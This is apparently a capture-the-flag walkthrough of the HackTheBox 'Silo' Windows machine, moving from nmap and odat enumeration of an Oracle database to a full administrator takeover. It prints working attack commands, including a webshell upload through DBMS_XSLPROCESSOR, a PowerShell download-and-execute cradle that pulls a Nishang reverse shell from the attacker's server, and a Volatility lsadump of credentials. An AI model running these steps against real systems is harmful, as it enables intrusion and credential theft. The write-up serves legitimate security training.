Hack The Box

HackTheBox “Silo” Walkthrough

Silo, a medium-level Windows OS machine on HackTheBox, we will take advantage of a vulnerability in its Oracle database to infiltrate the system. To elevate our privileges, we will examine a dumped memory file from…

HackTheBox “Silo” Walkthrough, figure 1

Silo, a medium-level Windows OS machine on HackTheBox, we will take advantage of a vulnerability in its Oracle database to infiltrate the system. To elevate our privileges, we will examine a dumped memory file from Dropbox using the widely used memory analysis tool called Volatility. Additionally, we will employ the lsadump technique of the Volatility tool to extract the plaintext admin password, allowing us to remotely log in as an administrator.

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to scan for open ports and services:

┌──(kali㉿kali)-[~/Desktop]└─$ sudo nmap -p- -T4 -A 10.10.10.82[sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 15:38 +03Nmap scan report for 10.10.10.82Host is up (0.091s latency).Not shown: 65519 closed tcp ports (reset)PORT      STATE SERVICE      VERSION80/tcp    open  http         Microsoft IIS httpd 8.5|_http-server-header: Microsoft-IIS/8.5| http-methods: |_  Potentially risky methods: TRACE|_http-title: IIS Windows Server135/tcp   open  msrpc        Microsoft Windows RPC139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.08080/tcp  open  http         Oracle XML DB Enterprise Edition httpd| http-auth: | HTTP/1.1 401 Unauthorized\x0D|_  Basic realm=XDB|_http-title: 401 Unauthorized|_http-server-header: Oracle XML DB/Oracle Database47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49152/tcp open  msrpc        Microsoft Windows RPC49153/tcp open  msrpc        Microsoft Windows RPC49154/tcp open  msrpc        Microsoft Windows RPC49155/tcp open  msrpc        Microsoft Windows RPC49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)49160/tcp open  msrpc        Microsoft Windows RPC49161/tcp open  msrpc        Microsoft Windows RPC49162/tcp open  msrpc        Microsoft Windows RPCNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.94%E=4%D=6/30%OT=80%CT=1%CU=37077%PV=Y%DS=2%DC=T%G=Y%TM=649ED1FOS:6%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10F%TI=I%CI=I%II=I%SS=S%TS=OS:7)SEQ(SP=103%GCD=1%ISR=10F%TI=I%CI=I%II=I%SS=S%TS=7)SEQ(SP=109%GCD=1%ISROS:=10C%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNOS:W8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3OS:=2000%W4=2000%W5=2000%W6=2000)ECN(R=N)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8OS:NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%OS:S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(OS:R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%FOS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TOS:=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RIOS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)Network Distance: 2 hopsService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 2s, deviation: 0s, median: 1s| smb2-security-mode: |   3:0:2: |_    Message signing enabled but not required| smb2-time: |   date: 2023-06-30T13:00:33|_  start_date: 2023-06-30T12:38:13| smb-security-mode: |   authentication_level: user|   challenge_response: supported|_  message_signing: supportedTRACEROUTE (using port 5900/tcp)HOP RTT       ADDRESS1   96.66 ms  10.10.14.12   109.74 ms 10.10.10.82OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1300.95 seconds

In the nmap scan, we found multiple open ports. Port 80 is for HTTP service, and port 1521 is for Oracle-TNS service. We will utilize odat for brute-forcing the Oracle Database TNS SID. The following command will continuously guess the Target’s SID until a valid one is obtained:

odat sidguesser -s 10.10.10.82

HackTheBox “Silo” Walkthrough, figure 2

We have successfully identified the valid SID, which is XE.

Our next step is to obtain valid credentials. To achieve this, we will utilize the odat tool by executing the following command against the target:

sudo odat all -s 10.10.10.82 -p 1521 -d XE -v

HackTheBox “Silo” Walkthrough, figure 3

Valid credentials have been successfully discovered, with the username “scott” and password “tiger”. Our next step involves gathering information and conducting further enumeration of the Oracle database library using these credentials using odat again with the command below.

odat all -s 10.10.10.82 -d XE -U scott -P tiger --sysdba

HackTheBox “Silo” Walkthrough, figure 4

The DBMS_XSLPROCESSOR library is enabled, allowing remote file uploads.

Exploitation:

We will take advantage of this by uploading the webshell below:

/usr/share/webshells/aspx/cmdasp.aspx

We will upload it to the target’s wwwroot directory, as port 80 is open and the uploaded file can be accessed through a web browser. We will use the odat command below to upload the aspx webshell.

odat dbmsxslprocessor -s 10.129.95.188 -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" shell.aspx /usr/share/webshells/aspx/cmdasp.aspx --sysdba

HackTheBox “Silo” Walkthrough, figure 5

Let’s access the web shell via the browser.

HackTheBox “Silo” Walkthrough, figure 6

We have obtained a web shell through the browser, granting us the ability to execute system commands. We are gonna move the webshell to a reverse shell utilizing the Nishang PowerShell script.

HackTheBox “Silo” Walkthrough, figure 7

We will append the PowerShell script with the reverse shell command below:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4343

HackTheBox “Silo” Walkthrough, figure 8

Launch an HTTP server on the same directory that has the powershell script.

HackTheBox “Silo” Walkthrough, figure 9

Launch a listener on our attack box.

HackTheBox “Silo” Walkthrough, figure 10

In the web shell’s user input field, we enter the following command:

powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')

HackTheBox “Silo” Walkthrough, figure 11

The script was downloaded from our HTTP server.

HackTheBox “Silo” Walkthrough, figure 12

And we get a shell on our listener.

HackTheBox “Silo” Walkthrough, figure 13

Privilege Escalation:

While searching for a method to elevate the shell’s privileges, I came across a file called “oracle issue.txt”.

HackTheBox “Silo” Walkthrough, figure 14

After discovering a Dropbox link in the text file, we accessed the link using the password (?%Hm8646uC$ ) obtained from the same file.

HackTheBox “Silo” Walkthrough, figure 15

Despite encountering difficulties with the password as it didn’t work, I managed to utilize the web shell to display the content of the file by executing the following command:

type "C:\users\Phineas\Desktop\Oracle issue.txt”

HackTheBox “Silo” Walkthrough, figure 16

It appears that the first character of the password is corrupted, possibly due to rendering issues in the terminal. Let’s attempt to use the password we obtained and see if it works.

HackTheBox “Silo” Walkthrough, figure 17

Upon successful authentication, we proceeded to dump the memory and discovered a zip file named “SILO-20180105–221806.zip” in the Dropbox. Unzipping the file resulted in the creation of a new dump file within the same directory, named “SILO-20180105–221806.dmp.”

HackTheBox “Silo” Walkthrough, figure 18

To use the Volatility tool, we require the target’s OS and system type as inputs.

HackTheBox “Silo” Walkthrough, figure 19

Using the powerful Volatility tool, we can extract the plain text password of the administrator from the memory dump file. To accomplish this, execute the following command:

sudo python2 vol.py -f /home/kali/Downloads/SILO-20180105-221806.dmp --profile=Win2012R2x64 lsadump

HackTheBox “Silo” Walkthrough, figure 20

After assembling the ASCII data, the plain text password is revealed as “DoNotH@ckMeBro!”. Now, let’s verify if it works with the administrator account by executing the following command:

evil-winrm -i 10.10.10.82 -u Administrator -p DoNotH@ckMeBro!

HackTheBox “Silo” Walkthrough, figure 21

Cheers.